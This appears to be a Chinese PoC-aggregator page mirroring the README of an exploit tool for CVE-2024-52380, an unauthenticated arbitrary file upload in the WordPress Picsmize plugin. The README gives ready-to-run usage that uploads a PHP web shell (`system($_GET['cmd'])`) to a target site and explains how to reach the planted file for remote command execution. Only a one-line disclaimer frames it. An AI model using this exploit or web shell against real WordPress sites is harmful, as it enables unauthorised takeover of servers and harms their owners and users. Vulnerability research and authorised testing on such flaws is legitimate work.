关联漏洞
标题:
WordPress plugin Picsmize 代码问题漏洞
(CVE-2024-52380)
描述:WordPress和WordPress plugin都是WordPress基金会的产品。WordPress是一套使用PHP语言开发的博客平台。该平台支持在PHP和MySQL的服务器上架设个人博客网站。WordPress plugin是一个应用插件。 WordPress plugin Picsmize 1.0.0版本及之前版本存在代码问题漏洞,该漏洞源于允许危险类型文件无限制上传。
描述
Picsmize plugin for WordPress is vulnerable to arbitrary file uploads.
介绍
# CVE-2024-52380-Exploit
Picsmize plugin for WordPress is vulnerable to arbitrary file uploads.
# Description
This script exploits a vulnerability (CVE-2024-52380) in the **Picsmize plugin** for WordPress, allowing unauthenticated attackers to perform arbitrary file uploads. This vulnerability exists in all versions of Picsmize up to and including **1.0.0**. Exploiting this vulnerability may result in remote code execution on the target server.
## 🌟 Features
- **Check Plugin Version**: Automatically verifies if the target WordPress site is using a vulnerable version of the Picsmize plugin.
- **File Upload Exploit**: Upload arbitrary PHP payloads to the target server if the site is vulnerable.
- **Command Line Interface**: Easy-to-use CLI for specifying target URLs and payloads.
## 📖 Vulnerability Details
- **Plugin Name**: Picsmize
- **Affected Versions**: All versions ≤ 1.0.0
- **Vulnerability Type**: Unauthenticated Arbitrary File Upload
- **CVE ID**: CVE-2024-52380
## 🚀 Usage Instructions
### Prerequisites
- Python 3.7 or higher
- `requests` library (`pip install requests`)
### Running the Script
1. Clone the repository:
```bash
git clone https://github.com/Nxploited/CVE-2024-52380-Exploit.git
cd CVE-2024-52380-Exploit
### Usage -help:
```
usage: CVE-2024-52380.py [-h] -u URL [-c CONTENT]
Check plugin version and upload a PHP file to a WordPress site.
options:
-h, --help show this help message and exit
-u URL, --url URL Base URL of the WordPress site (e.g., http://192.168.100.74:888).
-c CONTENT, --content CONTENT
Content of the PHP file to be uploaded.
```
### Example
```
python CVE-2024-52380.py -u http://192.168.1.100 -c "<?php system($_GET['cmd']); ?>"
```
### Command-Line Arguments
The script provides two command-line arguments for ease of use:
1. **`-u` / `--url` (required)**:
- **Purpose**: Specifies the base URL of the target WordPress site.
- **Example**:
```bash
-u http://example.com
```
2. **`-c` / `--content` (optional)**:
- **Purpose**: Sets the PHP payload content to be uploaded.
- **Default Value**:
```php
<?php phpinfo(); ?>
```
- **Example**:
```bash
-c "<?php system($_GET['cmd']); ?>"
```
### 📂 File Upload Path
#### Explanation:
- **`/wordpress`**: Root directory of the WordPress site.
- **`wp-content/uploads`**: Default directory for media uploads in WordPress.
- **`2025/01`**: The directory structure corresponds to the year (2025) and month (January) based on the server's date configuration.
#### How to Access the Uploaded File:
1. After a successful upload, navigate to the file using the full URL.
Example:
http://target-site.com/wordpress/wp-content/uploads/2025/01/t-678b2ef61b3f41737174774.php
### ⚠️ Disclaimer
This script is intended for educational purposes and authorized security testing only. Unauthorized use of this tool against systems you do not own or have explicit permission to test is illegal and unethical.
文件快照
[4.0K] /data/pocs/fa9e3abb178102a1edf2552087c3d9b760b8946c
├── [3.8K] CVE-2024-52380.py
└── [3.0K] README.md
0 directories, 2 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。